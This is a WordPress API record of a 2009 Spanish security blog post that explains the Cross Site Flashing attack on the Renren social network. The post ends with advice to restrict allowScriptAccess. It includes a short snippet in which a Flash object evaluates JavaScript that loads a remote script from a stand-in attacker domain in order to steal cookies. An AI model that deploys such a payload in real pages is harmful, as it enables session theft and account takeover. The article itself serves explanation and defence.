{"id":579,"date":"2009-08-27T08:32:41","date_gmt":"2009-08-27T11:32:41","guid":{"rendered":"https:\/\/www.talsoft-security.com\/site\/?p=579"},"modified":"2009-08-27T08:32:41","modified_gmt":"2009-08-27T11:32:41","slug":"xsf-ataque-web-encapsulado-en-flash","status":"publish","type":"post","link":"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/","title":{"rendered":"XSF: Ataque web encapsulado en Flash"},"content":{"rendered":"

Supongo que nuestros lectores habr\u00e1n oido hablar del gusano que afect\u00f3 a la red social Twitter all\u00e1 por el mes de abril. De hecho, Laura public\u00f3 un art\u00edculo sobre la contrataci\u00f3n del creador del mismo aqu\u00ed<\/a>. El ataque consist\u00eda en que gracias a una vulnerabilidad del tipo XSS (Cross-Site Scripting) permit\u00eda suplantar la identidad de un mont\u00f3n de usuarios atacados y twittear desde su cuenta.<\/p>\n

En este caso, el objetivo de los ataques ha sido la red social china Renren<\/a>. Para ello se ha utilizado una variante de ataque XSS encapsulado mediante archivos Flash. Como resultado, este ataque se ha llamado XSF o Cross Site Flashing<\/a>.<\/p>\n

\u00bfC\u00f3mo se llev\u00f3 a cabo el ataque?<\/span>
\nLa red social Renren permite, al igual que otras como Facebook o Tuenti, permite compartir contenido multimedia. Para ello se puede hacer mediante videos o en formato Flash. Para este \u00faltimo, el enlace a un fichero SWF, se hace mediante una funci\u00f3n llamada playswf() que crea una porci\u00f3n de c\u00f3digo as\u00ed:
\n
\n<embed src=\u201d\"+o.filename+\u201d\u201d type=\u201dapplication\/x-shockwave-flash\u201d<\/p>\n

\u201c+\u201dwidth=\u201d\"+(o.width||\u201d320?)+\u201d\u201d height=\u201d\"+(o.height||\u201d240?)+\u201d\u201d allowFullScreen=\u201dtrue\u201d<\/p>\n

wmode=\u201d\"+(o.wmode||\u201dtransparent\u201d)+\u201d\u201d allowScriptAccess=\u201dalways\u201d ><\/embed>
\n<\/code><\/p>\n

Atenci\u00f3n especial merece el par\u00e1metro “allowScriptAccess”. Gracias a \u00e9l se limita el nivel de acceso que el objeto “embebido” tendr\u00e1 sobre el resto de la p\u00e1gina HTML. Si se asigna “allowScriptAccess=sameDomain” el objeto flash, s\u00f3lo tendr\u00e1 acceso a la p\u00e1gina HTML si se llama desde el mismo dominio, haciendo falta que el atacante subiera el fichero a ejecutar al mismo dominio, utilizando alguna otra t\u00e9cnica.
\nSin embargo, en condiciones en las que el par\u00e1metro allowScriptAccess tenga el valor “always”, el objeto flash tiene acceso a cualquier parte de la sesi\u00f3n HTML, como por ejemplo, las cookies. 1, 2, 3,… responda otra vez: Las Cookies.<\/p>\n

A partir de aqu\u00ed el resto del ataque consiste en crear un objeto flash en el que se pueda incluir en el fichero Flash una porci\u00f3n de c\u00f3digo que ejecute un Javascript malicioso que env\u00ede las cookies de los usuarios que vean ese “inocente” flash a una localizaci\u00f3n remota. A partir de ah\u00ed el atacante contar\u00e1 con acceso a la identidad de un mont\u00f3n de usuarios.<\/p>\n

Por ejemplo,<\/p>\n

var fun = ‘var x=document.createElement(“SCRIPT”);x.src=”http:\/\/www.delatacante.com\/malicioso.js<\/a>“; x.defer=true;document.getElementsByTagName(“HEAD”)[0].appendChild(x);’;
\n<\/span>
\n flash.external.ExternalInterface.call(‘eval’, fun);<\/span>
\n <\/span><\/p>\n

Asimismo, el usuario final ver\u00e1 el flash sin saber que ha ejecutado c\u00f3digo Javascript malicioso robando su cookie.<\/p>\n

El ataque a la red social Renren, adem\u00e1s consist\u00eda en aprovechar las credenciales del individuo para enviar el video a todos sus contactos.<\/p>\n

Como pod\u00e9is ver, XSS encapsulado en un objeto Flash embebido en una p\u00e1gina web… gracias a excesivos permisos para ese objeto. Recomendaci\u00f3n, si ten\u00e9is alg\u00fan tipo de sitio web que permita compartir este tipo ficheros, forzad el par\u00e1metro “allowScriptAccess” a “samedomain”.<\/p>\n

Fuente: Security By<\/p>\n","protected":false},"excerpt":{"rendered":"

Supongo que nuestros lectores habr\u00e1n oido hablar del gusano que afect\u00f3 a la red social Twitter all\u00e1 por el mes de abril. De hecho, Laura public\u00f3 un art\u00edculo sobre la contrataci\u00f3n del creador del mismo aqu\u00ed. El ataque consist\u00eda en que gracias a una vulnerabilidad del tipo XSS (Cross-Site Scripting) permit\u00eda suplantar la identidad de […]<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-579","post","type-post","status-publish","format-standard","hentry","category-profesional"],"yoast_head":"\nTalSoft - Seguridad Inform\u00e1tica Empresarial - XSF: Ataque web encapsulado en Flash<\/title>\n<meta name=\"description\" content=\"Talsoft transforma la visi\u00f3n de las empresas para que puedan proteger su informaci\u00f3n cr\u00edtica y confidencial frente ataques inform\u00e1ticos. Cons\u00faltenos sin cargo.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Leandro Ferrari\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimated reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/\"},\"author\":{\"name\":\"Leandro Ferrari\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#\/schema\/person\/83d2ebde035a5a030c14e522351953c8\"},\"headline\":\"XSF: Ataque web encapsulado en Flash\",\"datePublished\":\"2009-08-27T11:32:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/\"},\"wordCount\":487,\"publisher\":{\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#organization\"},\"articleSection\":[\"Profesional\"],\"inLanguage\":\"en-GB\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/\",\"url\":\"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/\",\"name\":\"TalSoft - Seguridad Inform\u00e1tica Empresarial - XSF: Ataque web encapsulado en Flash\",\"isPartOf\":{\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#website\"},\"datePublished\":\"2009-08-27T11:32:41+00:00\",\"description\":\"Talsoft transforma la visi\u00f3n de las empresas para que puedan proteger su informaci\u00f3n cr\u00edtica y confidencial frente ataques inform\u00e1ticos. Cons\u00faltenos sin cargo.\",\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/\"]}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#website\",\"url\":\"https:\/\/www.talsoft-security.com\/site\/\",\"name\":\"TalSoft TS - Services IT Security\",\"description\":\"Talsoft is transforming awareness, control and decision-making power so that companies can protect their critical and confidential information from computer attacks.\",\"publisher\":{\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.talsoft-security.com\/site\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-GB\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#organization\",\"name\":\"Talsoft TS\",\"url\":\"https:\/\/www.talsoft-security.com\/site\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.talsoft-security.com\/site\/wp-content\/uploads\/2014\/02\/talsoft_logo_270x125.png\",\"contentUrl\":\"https:\/\/www.talsoft-security.com\/site\/wp-content\/uploads\/2014\/02\/talsoft_logo_270x125.png\",\"width\":270,\"height\":125,\"caption\":\"Talsoft TS\"},\"image\":{\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"http:\/\/www.facebook.com\/talsoftsrl\",\"https:\/\/x.com\/talsoft\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#\/schema\/person\/83d2ebde035a5a030c14e522351953c8\",\"name\":\"Leandro Ferrari\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/cd259c10675b9fd302b2e6264231febeeeb3de578400cf8c91c6577e50a0d34a?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/cd259c10675b9fd302b2e6264231febeeeb3de578400cf8c91c6577e50a0d34a?s=96&d=mm&r=g\",\"caption\":\"Leandro Ferrari\"},\"sameAs\":[\"http:\/\/www.talsoft.com.ar\",\"https:\/\/www.facebook.com\/talsoftsrl\/\",\"https:\/\/x.com\/avatar_leandro\"],\"url\":\"https:\/\/www.talsoft-security.com\/site\/author\/leandro\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"TalSoft - Seguridad Inform\u00e1tica Empresarial - XSF: Ataque web encapsulado en Flash","description":"Talsoft transforma la visi\u00f3n de las empresas para que puedan proteger su informaci\u00f3n cr\u00edtica y confidencial frente ataques inform\u00e1ticos. Cons\u00faltenos sin cargo.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/","twitter_misc":{"Written by":"Leandro Ferrari","Estimated reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/#article","isPartOf":{"@id":"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/"},"author":{"name":"Leandro Ferrari","@id":"https:\/\/www.talsoft-security.com\/site\/#\/schema\/person\/83d2ebde035a5a030c14e522351953c8"},"headline":"XSF: Ataque web encapsulado en Flash","datePublished":"2009-08-27T11:32:41+00:00","mainEntityOfPage":{"@id":"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/"},"wordCount":487,"publisher":{"@id":"https:\/\/www.talsoft-security.com\/site\/#organization"},"articleSection":["Profesional"],"inLanguage":"en-GB"},{"@type":"WebPage","@id":"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/","url":"https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/","name":"TalSoft - Seguridad Inform\u00e1tica Empresarial - XSF: Ataque web encapsulado en Flash","isPartOf":{"@id":"https:\/\/www.talsoft-security.com\/site\/#website"},"datePublished":"2009-08-27T11:32:41+00:00","description":"Talsoft transforma la visi\u00f3n de las empresas para que puedan proteger su informaci\u00f3n cr\u00edtica y confidencial frente ataques inform\u00e1ticos. Cons\u00faltenos sin cargo.","inLanguage":"en-GB","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.talsoft-security.com\/site\/xsf-ataque-web-encapsulado-en-flash\/"]}]},{"@type":"WebSite","@id":"https:\/\/www.talsoft-security.com\/site\/#website","url":"https:\/\/www.talsoft-security.com\/site\/","name":"TalSoft TS - Services IT Security","description":"Talsoft is transforming awareness, control and decision-making power so that companies can protect their critical and confidential information from computer attacks.","publisher":{"@id":"https:\/\/www.talsoft-security.com\/site\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.talsoft-security.com\/site\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-GB"},{"@type":"Organization","@id":"https:\/\/www.talsoft-security.com\/site\/#organization","name":"Talsoft TS","url":"https:\/\/www.talsoft-security.com\/site\/","logo":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/www.talsoft-security.com\/site\/#\/schema\/logo\/image\/","url":"https:\/\/www.talsoft-security.com\/site\/wp-content\/uploads\/2014\/02\/talsoft_logo_270x125.png","contentUrl":"https:\/\/www.talsoft-security.com\/site\/wp-content\/uploads\/2014\/02\/talsoft_logo_270x125.png","width":270,"height":125,"caption":"Talsoft TS"},"image":{"@id":"https:\/\/www.talsoft-security.com\/site\/#\/schema\/logo\/image\/"},"sameAs":["http:\/\/www.facebook.com\/talsoftsrl","https:\/\/x.com\/talsoft"]},{"@type":"Person","@id":"https:\/\/www.talsoft-security.com\/site\/#\/schema\/person\/83d2ebde035a5a030c14e522351953c8","name":"Leandro Ferrari","image":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/www.talsoft-security.com\/site\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/cd259c10675b9fd302b2e6264231febeeeb3de578400cf8c91c6577e50a0d34a?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/cd259c10675b9fd302b2e6264231febeeeb3de578400cf8c91c6577e50a0d34a?s=96&d=mm&r=g","caption":"Leandro Ferrari"},"sameAs":["http:\/\/www.talsoft.com.ar","https:\/\/www.facebook.com\/talsoftsrl\/","https:\/\/x.com\/avatar_leandro"],"url":"https:\/\/www.talsoft-security.com\/site\/author\/leandro\/"}]}},"_links":{"self":[{"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/posts\/579","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/comments?post=579"}],"version-history":[{"count":1,"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/posts\/579\/revisions"}],"predecessor-version":[{"id":580,"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/posts\/579\/revisions\/580"}],"wp:attachment":[{"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/media?parent=579"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/categories?post=579"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/tags?post=579"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}